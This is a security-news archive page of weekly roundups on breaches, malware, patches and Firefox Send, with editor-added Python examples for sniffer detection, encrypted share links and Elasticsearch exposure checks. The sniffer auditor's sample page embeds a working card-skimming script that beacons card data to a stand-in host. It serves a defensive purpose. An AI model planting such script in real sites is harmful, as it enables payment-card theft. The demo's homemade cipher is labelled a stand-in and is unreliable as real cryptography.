Category Archives: Security news

Naked Security – Sophos: Monday review – the hot 23 stories of the week

From a Citrix breach to John Oliver's FCC anti-robocall campaign, and everything in between - it's weekly roundup time.





Download audio: http://feeds.soundcloud.com/stream/590301654-sophossecurity-ep-023-facebook-promises-and-google-chrome-patches.mp3

Naked Security - Sophos

Most Of Android Antivirus Apps Are Fake And Ineffective

Two-thirds of Android antivirus apps are frauds and fail to provide protection

A recent report published by an Austrian antivirus-testing lab revealed that almost two-thirds of all Android antivirus apps are fake, unsafe or ineffective.

The lab, AV-Comparatives, tested 250 Android antivirus apps from the Google Play Store against 2,000 malware samples. Only 80 of the apps detected more than 30% of the malicious samples in the individual tests while raising zero false alarms.

The study also found that antivirus apps from 138 vendors detected less than 30% of the Android malware samples, or had a relatively high false alarm rate on popular clean files from the Google Play Store.

“Less than one in 10 of the apps tested defended against all 2,000 malicious apps, while over two-thirds failed to reach a block rate of even 30 percent”, the lab said in a press release.

“The main purpose of these apps seems to be generating easy revenue for their developers, rather than actually protecting their users.”

For the extensive study, the researchers used the 2,000 most common Android malware samples of 2018. To ensure the most accurate results, they installed each antivirus app on physical Android devices rather than emulators and used an automated test process (developed in cooperation with the University of Innsbruck) to open a browser, download a malicious app and install it on the device.

The study showed that only 23 apps detected 100 percent of the malware samples, while 14 apps managed to achieve more than 99 percent.

“We consider those apps to be risky, that is to say, ineffective or unreliable. In some cases, the apps are simply buggy, e.g. because they have poorly implemented a third-party engine. Others detect only a handful of ancient Android malware samples, and allow any apps that contain certain strings, making them likely to pass some quick checks and thus be accepted by the app stores”, the lab said.

AV-Comparatives’ founder and CEO Andreas Clementi says, “Although the number of Android security apps on the market has increased since last year, our test shows that a smaller proportion of the available apps will actually provide effective protection. Last year, a third of the security apps we tested failed to detect even 30 percent of malicious samples; this year, that proportion rose to over two thirds.”

Clementi also warns users not to rely on user ratings and download counts when choosing an antivirus app, as both can be faked.

“User ratings in the Google Play Store might show that a security app is easy to use. However, without independent testing, users cannot be sure if its detections are genuine, or whether it has given a clean bill of health to a malicious program. Our test report lets you know which programs will protect your Android device, without false alarms,” he added.

In the last few months, Google has removed security apps from 32 vendors from the Play Store with more expected to be removed in the future, says AV-Comparatives.

You can visit the AV-Comparatives site and check out the complete list of all the apps tested with their scores and details of the methodology used.

The post Most Of Android Antivirus Apps Are Fake And Ineffective appeared first on TechWorm.

Blog | Avast EN: Gearbest Data Breach Puts Millions at Risk | Avast

White hat hackers scanning the web for exposed systems and data leaks stumbled upon an unsecured Elasticsearch server containing millions of Gearbest customer records. Gearbest is an Amazon-style e-commerce site focused on tech and Chinese brands; it ships to over 250 countries and runs 18 subdomains in different languages. Under parent company Globalegrow, Gearbest is a billion-dollar business, but while its privacy policy states that the company encrypts all customer information it retains, the unsecured server found online shows that this is not true. Hundreds of thousands of customers are putting themselves at risk daily, adding their information to a growing repository of customer data that anyone can access.



Blog | Avast EN

Cyber Security Week in Review (March 15)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • The U.S. warned Germany that using Huawei’s 5G technology could result in a drop in information-sharing. American officials have consistently criticized the use of the Chinese company’s technology, saying it poses a national security risk. The U.S. says that if other countries adopt Huawei’s 5G equipment, it would fear its shared intelligence was not being kept safe.
  • A hacking group is reported to have stolen an estimated six terabytes of data from the Citrix enterprise network. The company said it took steps to contain the breach after being alerted by the FBI, but thousands of customers’ information could still be at risk. The nature of the data taken is not yet known.
  • Adobe fixed multiple remote code execution vulnerabilities in Photoshop and Digital Editions. The company released its monthly security update earlier this week. Two of the vulnerabilities were classified as critical, as an attacker could exploit them to execute code under the context of the current user.

From Talos


  • A new point-of-sale malware known as “GlitchPOS” has popped up on some online marketplaces. The malware is easy enough to install and use that virtually any user could buy their way into setting up their own botnet. We believe with high confidence that this is not the first malware created by this actor.
  • Microsoft released its monthly security update earlier this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 64 vulnerabilities, 17 of which are rated “critical,” 45 that are considered “important” and one “moderate” and “low” vulnerability each. This release also includes two critical advisories: one covering security updates to Adobe Flash Player and another concerning SHA-2.
  • CleanMyMac X contains a privilege escalation vulnerability in its helper service due to improper updating. The application fails to remove the vulnerable components upon upgrading to the latest version, leaving the user open to attack. CleanMyMac X is an all-in-one cleaning tool for Macs from MacPaw.

The rest of the news


  • Video app TikTok paid a $5.7 million fine to the Federal Trade Commission this week as part of a settlement. The FTC ruled that the app, which allows users to upload short videos of themselves performing songs, improperly handled the data of users under the age of 13.
  • Two U.S. Senators introduced a new bill that would overhaul the country’s child privacy laws. The new bill would give parents complete control over their children's data online, and even allow them to completely erase information from certain websites. It would also ban targeted ads toward anyone under the age of 13.
  • Security researchers discovered a critical flaw in Switzerland’s new voting system that would allow attackers to manipulate votes. The group is now urging the Swiss government to halt the rollout of the online system.
  • Social media hackers are stepping up their activity as Brexit votes continue in the U.K. Researchers discovered an uptick in fake accounts that are spreading pro-Brexit sentiment over the past several weeks.
  • The U.S.’s Office of the Inspector General says NASA’s information security program contains several critical vulnerabilities. A new report states that the space agency could be open to an attack from a nation-state actor.


Group-IB : payment data of thousands of customers of UK and US online stores could have been compromised




Moscow, 14.03.2019 – Group-IB, an international company that specializes in preventing cyberattacks, has uncovered malicious code designed to steal customers’ payment data on seven online stores in the UK and the US. The injected code has been identified as a new JavaScript sniffer (JS Sniffer), which Group-IB has dubbed GMO.

Group-IB’s Threat Intelligence team first discovered the GMO JS Sniffer on the website of the international sporting goods company FILA UK, where it could have led to the theft of the payment details of at least 5,600 customers over the past four months.

Do your payments have the sniffles?

Recent breaches of this kind include British Airways and Ticketmaster, first analyzed by RiskIQ’s research team, in which cybercriminals compromised the personal information of thousands of travelers and concertgoers with a few lines of code. Both websites were infected with JS Sniffers, malicious code injected into a victim’s website to steal consumers’ personal data, including payment card details, names and credentials.

The FILA UK website (fila.co[.]uk) became cybercriminals’ new major target on the UK market. GMO JS Sniffer has also been discovered on six other websites belonging to US-based companies. This type of attack is especially dangerous because it can be applied to almost any e-commerce site around the world. Group-IB made multiple attempts to alert FILA, which was known to be affected by GMO, and notified the six other affected websites upon discovery. Group-IB has also reached out to local authorities in the UK and the US to conduct outreach.

Group-IB’s Threat Intelligence team detected the malicious code on the FILA UK website in early March 2019. Further research revealed that GMO JS Sniffer has presumably been collecting customer payment data since November 2018. According to Alexa.com, fila.co[.]uk receives an estimated 140,000 unique visitors per month.

According to IRP, a UK market research firm, the minimum purchase conversion rate for fashion and clothing e-commerce is 1%. Using very conservative estimates (140,000 visitors a month, a 1% conversion rate, four months of exposure), the payment and personal details of at least 5,600 customers could have been stolen: everyone who has purchased items on fila.co[.]uk since November 2018 has potentially had their details compromised. Stolen customer data is typically resold in underground card shops. Another cash-out scheme is to use the compromised cards to buy valuable goods, such as electronics, for onward sale.
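The article describes JS Sniffers only in outline: script injected into a checkout page that reads card fields, hooks form submission and ships the data elsewhere. The following is an added example written for this page, not Group-IB's tooling, of how a site owner can audit a checkout page for exactly that shape: external scripts served from hosts outside an allowlist, and inline scripts that combine card-field access with a submit hook or an exfiltration path. The trusted host list, the indicator regexes and the sample checkout page are assumptions constructed for the example; real sniffers are often obfuscated, so treat the patterns as a triage aid rather than a complete detector.

```python
"""Audit a checkout page for script tags that look like injected payment-data sniffers.

Added example (editor's code, not Group-IB's). Trusted hosts, indicator patterns and the
sample page are assumptions constructed for this illustration.
"""
import re
from html.parser import HTMLParser

# Hosts the site operator expects to serve JavaScript from (assumed for the example).
TRUSTED_SCRIPT_HOSTS = {"www.example-shop.test", "cdn.example-shop.test"}

# Indicators typical of card sniffers: reading checkout fields, hooking form submission,
# moving data off-site, and the string-building tricks used to hide all of the above.
SNIFFER_INDICATORS = {
    "card_field_access": re.compile(r"(cardnumber|card_number|ccnum|cvv|cvc|expir)", re.I),
    "submit_hook": re.compile(r"addEventListener\(\s*['\"]submit['\"]|onsubmit", re.I),
    "exfil": re.compile(r"(new\s+Image\(|\.src\s*=|XMLHttpRequest|fetch\(|sendBeacon)", re.I),
    "obfuscation": re.compile(r"(atob\(|unescape\(|String\.fromCharCode|\\x[0-9a-f]{2}){2,}", re.I),
}


class _ScriptCollector(HTMLParser):
    """Collect every <script> on the page as (src or None, inline body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def _host_of(src):
    """Host part of an absolute or protocol-relative URL; None for same-origin relative paths."""
    m = re.match(r"^(?:https?:)?//([^/]+)", src.strip())
    return m.group(1).lower() if m else None


def audit_page(html, trusted_hosts=TRUSTED_SCRIPT_HOSTS):
    """Return a list of (reason, detail) findings for one HTML page."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        if src:
            host = _host_of(src)
            if host and host not in trusted_hosts:
                findings.append(("untrusted_script_host", src))
            continue
        hits = [name for name, rx in SNIFFER_INDICATORS.items() if rx.search(body)]
        # Card-field access combined with a hook or an exfil path is the sniffer signature;
        # either alone is common in legitimate checkout code.
        if "card_field_access" in hits and ({"submit_hook", "exfil"} & set(hits)):
            findings.append(("inline_sniffer_pattern", ",".join(sorted(hits))))
    return findings


# Constructed sample: a checkout page with first-party scripts plus an injected sniffer
# that loads from, and posts to, a host the shop does not control.
SAMPLE_CHECKOUT_HTML = """
<html><body>
<form id="checkout"><input name="cardnumber"><input name="cvv"></form>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example-shop.test/app.js"></script>
<script src="https://stats-collect.test/gmo.js"></script>
<script>
document.getElementById('checkout').addEventListener('submit', function(){
  var d = document.querySelector('[name=cardnumber]').value + '|' +
          document.querySelector('[name=cvv]').value;
  new Image().src = 'https://stats-collect.test/g?x=' + btoa(d);
});
</script>
</body></html>
"""

if __name__ == "__main__":
    for reason, detail in audit_page(SAMPLE_CHECKOUT_HTML):
        print(reason, detail)
```

Run against the constructed page, the audit reports the off-site `gmo.js` include and the inline block that reads the card fields and beacons them out via an image request. Running the same audit periodically against the live checkout page, and diffing the results, is a cheap way to notice an injection like the one described above between November and March.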

Mozilla introduces ‘Firefox Send’, a free and encrypted file transfer service

Mozilla’s encrypted file-transfer service ‘Firefox Send’ is now available to all

Mozilla yesterday announced ‘Firefox Send’ – a free encrypted file-transfer service – that is now available for everyone. Firefox Send is a website that allows users to transfer large files to other users from any web browser free of charge.

“We know there are several cloud sharing solutions out there, but as a continuation of our mission to bring you more private and safer choices, you can trust that your information is safe with Send,” wrote Nick Nguyen, Mozilla’s Vice President of Product Strategy. “As with all Firefox apps and services, Send is Private By Design, meaning all of your files are protected, and we stand by our mission to handle your data privately and securely.”

Here’s how Firefox Send works:

To use Firefox Send, just open the website (send.firefox.com) in a web browser, click the “select files to upload” button or drag and drop whatever files you would like to share into the browser window. Then click upload and your file will be sent to Mozilla’s server. You will receive a download link that you can send to the recipient, which will allow them to download your file.

Anyone can share files up to 1GB without logging in; signing up for a free Firefox account raises the limit to 2.5GB, Mozilla said.

You can set the download link to expire after a certain period of time or after a certain number of downloads. Currently, Firefox Send allows links to remain for at most 7 days or 100 downloads. At present, you must choose both a timeframe and a download limit; the link expires when either is reached, whichever comes first.

“By default, files are stored for a maximum of either 24 hours or 7 days. If you choose a download cap, the file can be deleted from our server sooner,” said Mozilla while explaining how it handles files uploaded to Send in its privacy document.

Even though the files are encrypted, you are also given the option to password-protect the link for an extra layer of security. You can upload one file at a time or multiple files at once, which Firefox Send automatically bundles into a single ZIP file.
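The article says the files are encrypted and can additionally be password-protected, but not how a link-sharing service can be built so that the operator cannot read the files it stores. The following is an added example, editor's code rather than Mozilla's, of the design pattern behind such services: the client encrypts before upload, the key travels only in the URL fragment (the part after `#`, which browsers never send to the server), and an optional password produces a verifier the server checks before handing out ciphertext. The actual Send protocol is not described on the page and is not reproduced here; in particular, Python's standard library has no AES, so the cipher below is HMAC-SHA256 run in counter mode with an encrypt-then-MAC tag, a stand-in for an AEAD. The hostname, the URL layout, the client-chosen file id and the download-cap-only expiry (no time limit) are assumptions made for the example.

```python
"""Shape of an end-to-end encrypted share link: key in the fragment, ciphertext on the server.

Added example (editor's code, not Mozilla's). The HMAC-counter-mode cipher, the hostname,
the URL layout and the client-chosen file id are assumptions for illustration only.
"""
import base64
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit, urlunsplit

SERVICE_HOST = "send.example.test"   # assumed hostname


def _b64(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _subkey(key, label):
    # Separate encryption and MAC keys derived from the one key carried in the link.
    return hmac.new(key, label, hashlib.sha256).digest()


def _keystream(enc_key, nonce, length):
    # HMAC-SHA256 in counter mode: a PRF-based stream cipher standing in for a real AEAD.
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(enc_key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def encrypt(plaintext, key):
    nonce = secrets.token_bytes(16)
    ks = _keystream(_subkey(key, b"enc"), nonce, len(plaintext))
    ct = bytes(a ^ b for a, b in zip(plaintext, ks))
    tag = hmac.new(_subkey(key, b"mac"), nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag                      # encrypt-then-MAC


def decrypt(blob, key):
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(_subkey(key, b"mac"), nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed: wrong key or tampered ciphertext")
    ks = _keystream(_subkey(key, b"enc"), nonce, len(ct))
    return bytes(a ^ b for a, b in zip(ct, ks))


def password_verifier(password, file_id):
    # Derived on the client; the server stores this, never the password or the file key.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), file_id.encode(), 100_000)


class Server:
    """Everything the service ever sees: an id, ciphertext, a download cap and an optional verifier."""

    def __init__(self):
        self.store = {}

    def upload(self, file_id, blob, max_downloads, verifier=None):
        self.store[file_id] = {"blob": blob, "left": max_downloads, "verifier": verifier}

    def download(self, request_url, proof=None):
        parts = urlsplit(request_url)
        assert parts.fragment == "", "browsers strip the fragment; the key never arrives here"
        file_id = parts.path.rsplit("/", 1)[-1]
        rec = self.store.get(file_id)
        if rec is None:
            return None
        if rec["verifier"] is not None and not (proof and hmac.compare_digest(rec["verifier"], proof)):
            return None                           # wrong or missing password: no ciphertext, no decrement
        rec["left"] -= 1
        if rec["left"] == 0:
            del self.store[file_id]               # hitting the download cap deletes the file
        return rec["blob"]


def share(server, plaintext, max_downloads=1, password=None):
    key = secrets.token_bytes(32)
    file_id = _b64(secrets.token_bytes(8))        # client-chosen id (assumption, keeps the example short)
    verifier = password_verifier(password, file_id) if password else None
    server.upload(file_id, encrypt(plaintext, key), max_downloads, verifier)
    # The key goes in the fragment only; the path carries just the id.
    return urlunsplit(("https", SERVICE_HOST, f"/download/{file_id}", "", _b64(key)))


def receive(server, link, password=None):
    parts = urlsplit(link)
    key = _unb64(parts.fragment)                  # the recipient's browser reads this locally
    file_id = parts.path.rsplit("/", 1)[-1]
    proof = password_verifier(password, file_id) if password else None
    wire_url = urlunsplit(parts._replace(fragment=""))   # what is actually sent to the server
    blob = server.download(wire_url, proof)
    return None if blob is None else decrypt(blob, key)
```

Two properties are worth checking in the code rather than taking on trust: the server's store holds only ciphertext that fails to decrypt under any key but the one in the fragment, and a wrong password neither returns ciphertext nor consumes a download. Sending the link over a channel the service operator can read (for instance by e-mail through the same provider) would of course hand them the key as well; the fragment design only keeps the key away from the storage server.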

Firefox Send is currently available through the send.firefox.com website. Also, a Firefox Send for Android app is in the works and will be available in beta later this week.

The post Mozilla introduces ‘Firefox Send’, a free and encrypted file transfer service appeared first on TechWorm.

Cyber Security Week in Review (March 8)



Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week

  • Chinese tech company Huawei is suing the U.S. government. The company alleges that the federal government violated the Constitution when it banned government agencies from buying Huawei software. The two sides have been locked in a war of words over the past year as U.S. officials raise allegations of spying and security concerns against Huawei.
  • Cisco disclosed 23 vulnerabilities affecting the NX-OS software that could put some switches at risk. The most critical vulnerability, which received a CVSS score of 8.6, lies in the Lightweight Directory Access Protocol (LDAP) in Cisco FXOS and NX-OS. An attacker could exploit this bug to gain the ability to restart the device, resulting in a denial of service. Snort rules 49334 - 49336 and 49350 can protect you from these vulnerabilities.
  • The National Security Agency released its reverse-engineering tool, Ghidra, to the public. At the RSA security conference, the agency made the software open source. While there are many reverse-engineering tools on the market, the NSA has spent years refining Ghidra and it’s widely considered one of the most sophisticated decompilers available.

From Talos

  • Information security and operational security teams need to work together to protect IoT. That was the main takeaway from Cisco’s keynote at the RSA conference earlier this week. Matt Watchinski, the vice president of Cisco Talos, and Liz Centoni, the head of Cisco’s internet-of-things business group, said that IoT devices have become so entrenched in our society that it’s more important now than ever to secure them. You can watch a replay of the address here.
  • There are three vulnerabilities in Pixar Renderman that could allow an attacker to elevate their privileges to root. Renderman is a rendering application used in animation and film production produced by Pixar, a well-known film studio. When installing the application, a helper tool is installed and launched as root. This service continues to listen even after installation is complete. These vulnerabilities lie in the `Dispatch` function of this helper tool.

Malware roundup

  • A new, layered malware has popped up on the popular Pirate Bay torrenting website. Known as PirateMatryoshka, the trojan disguises itself as a legitimate torrent. Once downloaded, it has numerous layers to it and acts as a downloader to several other malicious programs. 
  • A relatively unknown threat group known as “Whitefly” is allegedly behind an attack on Singapore’s health care database. Security researchers say the group was behind the exposure of 1.5 million patients’ records in July, most likely using DLL load-order hijacking.
  • “Scarlett Widow,” a hacking group believed to be based in Nigeria, recently started a new wave of attacks. The actor has sent several malicious emails to K-12 schools and non-profits, including the Boy Scouts of America. So far the group is believed to have information on 30,000 individuals from 13,000 organizations across 13 different countries.

The rest of the news

  • More than 300 million private messages in China were exposed on the internet. It is widely believed that the messages, which were transmitted on secure messaging apps, had been collected by the Chinese government. The database made personal identities searchable by anyone who found the IP address. 
  • U.S. Cyber Command carried out an offensive operation against a Russian troll farm last year. The attack targeted groups known for spreading misinformation, specifically trying to shut them down on the day of the 2018 midterm elections in the U.S.
  • A new Senate report says Equifax neglected proper cybersecurity practices for years. The credit reporting agency was the victim of a massive cyber attack in 2017 that led to the exposure of 145 million Americans’ personal information. The report states that the attack could have been avoided had the company followed “widely agreed upon” cybersecurity practices. 


Cyber Security Week in Review (March 1)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Drupal patched a “highly critical” vulnerability that attackers exploited to deliver cryptocurrency miners and other malware. Some field types in the content management system did not properly sanitize data from non-form sources, which allowed an attacker to execute arbitrary PHP code. Users need to update to the latest version of Drupal to patch the bug. Snort rule 49257 also protects users from this vulnerability.
  • Cryptocurrency mining tool Coinhive says it’s shutting down, but not due to malicious use. Attackers have exploited the tool for months as part of malware campaigns, stealing computing power from users to mine cryptocurrencies. However, the company behind the miner says it’s shutting down because it’s no longer economically viable to run. Snort rules 44692, 44693, 45949 - 45952, 46365 - 46367, 46393, 46394 and 47253 can protect you against the use of Coinhive. 
  • Several popular apps unknowingly share users’ personal information with Facebook. In many cases, this can include personal health information, such as women’s menstrual cycles, users’ heart rates and recent home purchases. The data is sent to Facebook even if the user doesn’t have a Facebook profile.

From Talos


  • Attackers are increasingly going after unsecured Elasticsearch clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines.
  • The latest Beers with Talos podcast covers the importance of privacy. Special guest Michelle Dennedy, Cisco’s chief privacy officer, talks about recent initiatives the company is taking on and how other organizations can do better. 
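Two of the Elasticsearch items on this page (the Gearbest customer records sitting on an unauthenticated server, and the Talos note above about attackers passing scripts through search requests on versions 1.4.2 and lower) come down to two questions a defender can answer from a single request to a node's root endpoint: does it answer without credentials at all, and is it old enough to fall into that script-injection era? The following is an added example, editor's code rather than Talos or Avast tooling, that classifies a node from that response. The version threshold is the one the text states; the sample responses are constructed, and `probe()` needs network access while `classify()` does not.

```python
"""Triage an Elasticsearch node from its root endpoint: anonymous access and legacy version.

Added example (editor's code). The 1.4.2 cutoff is the version the text names; the sample
responses below are constructed for illustration.
"""
import json
import urllib.request
from urllib.error import HTTPError, URLError

LEGACY_SCRIPT_CUTOFF = (1, 4, 2)


def parse_version(ver):
    """'1.4.10' -> (1, 4, 10); compares numerically, unlike strings ('1.4.10' < '1.4.2')."""
    core = ver.split("-")[0]                    # drop pre-release suffixes such as 7.0.0-beta1
    return tuple(int(part) for part in core.split("."))


def classify(status, body):
    """Map an HTTP status and root-endpoint body to a short list of findings."""
    if status == 401:
        return ["auth_required"]
    if status != 200:
        return [f"unexpected_status_{status}"]
    try:
        info = json.loads(body)
        version = parse_version(info["version"]["number"])
    except (ValueError, KeyError, TypeError):
        return ["unparseable_response"]
    # A 200 carrying cluster metadata with no credentials presented is the Gearbest situation.
    findings = ["anonymous_access"]
    if version <= LEGACY_SCRIPT_CUTOFF:
        findings.append("legacy_script_injection_target")
    return findings


def probe(url, timeout=5):
    """Fetch a node's root endpoint and classify it (network access required)."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return classify(resp.getcode(), resp.read().decode("utf-8", "replace"))
    except HTTPError as err:
        return classify(err.code, "")
    except URLError as err:
        return [f"unreachable: {err.reason}"]


# Constructed sample responses in the shape Elasticsearch returns from GET /.
OLD_NODE = json.dumps({"name": "node-1", "cluster_name": "elasticsearch",
                       "version": {"number": "1.4.2"}, "tagline": "You Know, for Search"})
NEW_NODE = json.dumps({"name": "node-2", "cluster_name": "prod",
                       "version": {"number": "6.5.4"}, "tagline": "You Know, for Search"})

if __name__ == "__main__":
    print("old node:", classify(200, OLD_NODE))
    print("new node:", classify(200, NEW_NODE))
    print("locked down:", classify(401, ""))
```

The version comparison is the part people get wrong in quick shell one-liners: a string comparison puts `1.4.10` before `1.4.2`, which is exactly the direction that hides an upgrade. An `anonymous_access` finding on its own is already a problem for any node reachable from the internet, whatever the version.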

Vulnerability roundup


  • A flaw in the Ring doorbell could allow an attacker to spy on users’ homes and even inject falsified video. The vulnerability could open the door for a man-in-the-middle attack against the smart doorbell app since the sound and video recorded by the doorbell is transmitted in plaintext. 
  • Cisco disclosed multiple vulnerabilities in a variety of its products, including severe bugs in routers. The company urged users of its firewall routers and VPN to patch immediately Thursday, warning against a remote code execution vulnerability. There’s also a certificate validation vulnerability in Cisco Prime Infrastructure that could allow an attacker to perform a man-in-the-middle attack against the SSL tunnel between Cisco’s Identity Service Engine and Prime Infrastructure. Snort rule 49240 protects users from the Prime Infrastructure vulnerability. 
  • New flaws in 4G and 5G could allow attackers to track users’ location and intercept phone calls. A new research paper discloses what are believed to be the first vulnerabilities that affect both generations of the mobile network technology.

The rest of the news


  • Cisco Duo recently launched CRXcavator, a service that scans Google Chrome extensions. It crawls the Chrome Web Store and delivers reports on individual extensions based on the permissions they request and the potential uses of those permissions.
  • Google is under fire for allegedly forgetting to inform users of a microphone inside of its Nest smart hub. While the company says it was never supposed to be a secret, users, security researchers and even politicians now are questioning why the microphone was installed in the first place. 
    • Talos Take: "To be clear, because some news outlets have reported this microphone as being present in the Nest THERMOSTAT.  It is NOT present in the thermostat, it’s present in the Smart Hub, which is the centerpiece of their home security solution," Joel Esler, senior manager, Communities Division.


Cyber Security Week in Review (Feb. 22)



Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • U.S. officials charged a former member of the Air Force with defecting in order to help an Iranian cyber espionage unit. The Department of Justice says the woman collected information on former colleagues, and the Iranian hackers then attempted to target those individuals and install spyware on their computers.
  • The U.S. Department of Justice is dismantling two task forces aimed at protecting American elections. The groups were originally created after the 2016 presidential election to prevent foreign interference but after the 2018 midterms, the Trump administration shrunk their sizes significantly. 
  • Facebook and the U.S. government are closing in on a settlement over several privacy violations. Sources familiar with the discussions say it will likely result in a multimillion-dollar fine, likely to be the largest the Federal Trade Commission has ever imposed on a technology company. 

From Talos


  • There’s been a recent uptick in Brushaloader infections. While the malware has been around since mid-2018, this new variant is more difficult than ever to detect on infected machines. New features include the ability to evade detection in sandboxes and to avoid anti-virus protection.
  • New features in WinDbg make it easier for researchers to debug malware. A new JavaScript bridge brings WinDbg in line with other modern programs. Cisco Talos walks users through these new features and shows how to use them.

Malware roundup


  • Google says it’s stepping up its banning of malicious apps. The company says it has seen a 66 percent increase in the number of apps it has banned from the Google Play store over the past year. Google says it scans more than 50 billion apps a day on users’ phones for malicious activity.
  • A new campaign using the Separ malware is attempting to steal login credentials at large businesses. The malware uses short scripts and legitimate executable files to avoid detection. 
  • A new ATM malware called "WinPot" turns the machines into "slot machines." This allows hackers to essentially gamify ATM hacking, randomizing how much money the machine dispenses. 

The rest of the news


  • The U.S. is reviving a secret program to carry out supply-chain attacks against Iran. The cyber attacks are targeted at the country’s missile program. Over the past two months, two of Iran’s efforts to launch satellites have failed within minutes, though it’s difficult to assign those failures to the U.S. 
  • Australia says a “sophisticated state actor” carried out a cyber attack on its parliament. The ruling Liberal-National coalition parties say their systems were compromised in the attack. Since then, the country says it’s put “a number of measures” in place to protect its election system. 
  • Cisco released security updates for 15 vulnerabilities. Two critical bugs could allow attackers to gain root access to a system, and a third opens the door for a malicious actor to bypass authentication altogether. 
  • Facebook keeps a list of users that it believes could be a threat to the company or its employees. The database is made up of users who have made threatening posts against the company in the past. 


Cyber Security Week in Review (Feb. 15, 2019)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Email provider VFEmail says it suffered a “catastrophic” cyber attack. The company warned that about 18 years’ worth of customers’ emails may be permanently gone. “Every file server is lost, every backup server is lost. Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy,” VFEmail representatives said in a statement. 
  • Russia is considering isolating itself from the global internet. The Kremlin is experimenting with a new practice of only routing the country’s web requests through the country and not internationally. The country will run a test later this year in an effort to test its cyber defenses.
  • Apple released fixes for multiple security flaws in iOS. Two of the vulnerabilities, which were discovered by Google’s threat research team, were being exploited in the wild. The bugs could allow an attacker to escalate their privileges and eventually completely take over a device. 

From Talos


  • Microsoft released its monthly security update this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 69 vulnerabilities, 20 of which are rated “critical,” 46 that are considered “important” and three that are “moderate.” This release also includes a critical security advisory regarding a security update to Adobe Flash Player. 
  • Adobe released security updates for several of its products, including Flash and Acrobat Reader. Cisco Talos specifically discovered a critical remote code execution vulnerability in Adobe Acrobat Reader DC. An attacker could cause a heap overflow by tricking the user into opening a specially crafted PDF, which would allow the attacker to gain code execution privileges. 
  • A new tool from Talos can allow you to study the effect of cyber attacks on oil pump jacks. We released a 3-D printed, small-scale model of a pump jack that can be “hacked” from a smartphone, causing it to eventually overheat. We’ll also be taking this exhibit on the road over the course of the year. 

Malware roundup


  • A new variant of the Astaroth trojan is targeting Brazil via multiple spam campaigns. Once a machine is infected, the malware can steal users’ personal information, and it uses several layers of obfuscation to make it more difficult to detect. The spam emails are also hitting users in parts of Europe.
  • Credit unions across the U.S. received phishing emails last week targeting anti-money laundering efforts. The phony emails claim to have information on unauthorized wire transfers and ask recipients to open a PDF that displays the alleged transaction and contains a link to a malicious web page. The attackers used information that’s believed to be available only to the National Credit Union Administration.
  • Google removed a cryptocurrency-stealing malware from its store. The malicious app disguised itself as the legitimate MetaMask service. Once downloaded, it would steal login credentials to steal users’ Ethereum funds. 

The rest of the news


  • Blockchain technology could be useful in detecting deepfake videos, specifically in police body cameras. A new tool called Amber Authenticate runs in the background on the camera and records hashes of the video; if the footage is later edited, its hash no longer matches the recorded one. The hashes are recorded on a public blockchain.
  • India requested Facebook give its government a backdoor into the WhatsApp messaging app. This would require Facebook to give the government access to users’ encrypted messages that were originally secret.
  • Two U.S. senators are requesting an investigation into foreign VPN services. The senators say the companies could pose a national security risk.  


Zepto Ransomware Packed into WSF Spam

ThreatTrack Labs has recently observed a surge of spam containing a zip attachment with a WSF (Windows Scripting File) to deliver Zepto ransomware. This tactic is a change from the common JavaScript and macro documents being spammed previously.

Here are actual emails featuring familiar social engineering tactics (three screenshots of spam messages carrying the infected WSF attachment).

The zip attachments contain the WSF (screenshot of the extracted WSF file).

 

An Interactive Analysis with ThreatAnalyzer

To see what we’re dealing with, we turned to ThreatTrack’s malware analysis sandbox ThreatAnalyzer.

We extracted the WSF, submitted it to ThreatAnalyzer and generated the following threat analysis:


Since this is a script, we are most interested in the call tree from WScript.exe. One notable result, circled above, is the number of modified files. This strongly indicates that the sample is either a virus or ransomware, and considering the proliferation of ransomware attacks lately, that is our biggest concern.

There are two captured screenshots from our analysis (the first shows the ransomware infection screen).

Expanding the MODIFIED FILES shows this result.


The files affected are renamed with a “.zepto” filename extension.

Given the screenshot and Modified Files artifacts, we can confidently say that this is a variant of the Zepto ransomware.

The WSF Script Behavior

